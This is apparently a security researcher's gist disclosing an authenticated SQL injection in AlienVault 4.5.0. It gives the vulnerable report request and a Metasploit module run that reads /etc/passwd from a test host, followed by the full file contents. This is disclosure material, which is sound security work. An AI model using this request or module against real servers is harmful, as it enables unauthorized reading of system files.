Skip to content

Instantly share code, notes, and snippets.

@brandonprry

brandonprry/gist:9874177

Last active August 29, 2015 13:57
Download ZIP
AlienVault 4.5.0 authenticated sql injection
Raw
gistfile1.txt
The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
-----------------------------------------------------------------------------
Quick run of the module:
msf auxiliary(alienvault_isp27001_sqli) > show options
Module options (auxiliary/gather/alienvault_isp27001_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes Path to remote file
PASSWORD password yes Single password
Proxies no Use a proxy chain
RHOST 172.31.16.150 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Relative URI of installation
USERNAME username yes Single username
VHOST no HTTP server virtual host
msf auxiliary(alienvault_isp27001_sqli) > run
[+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
[*] Auxiliary module execution completed
80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300
[*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
root:x:0:0:root:/root:/usr/bin/llshell
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
munin:x:102:104::/var/lib/munin:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
ossec:x:1000:1000::/var/ossec/:/bin/false
ossecm:x:1001:1000::/var/ossec/:/bin/false
ossecr:x:1002:1000::/var/ossec/:/bin/false
ntop:x:106:111::/var/lib/ntop:/bin/false
snort:x:107:112:Snort IDS:/var/log/snort:/bin/false
prads:x:108:113::/home/prads:/bin/false
nagios:x:109:114::/var/lib/nagios:/bin/false
mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false
asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false
mongodb:x:112:65534::/home/mongodb:/bin/false
avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false
avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false
stunnel4:x:115:122::/var/run/stunnel4:/bin/false
avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false
avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash
rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false
msf auxiliary(alienvault_isp27001_sqli) >
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment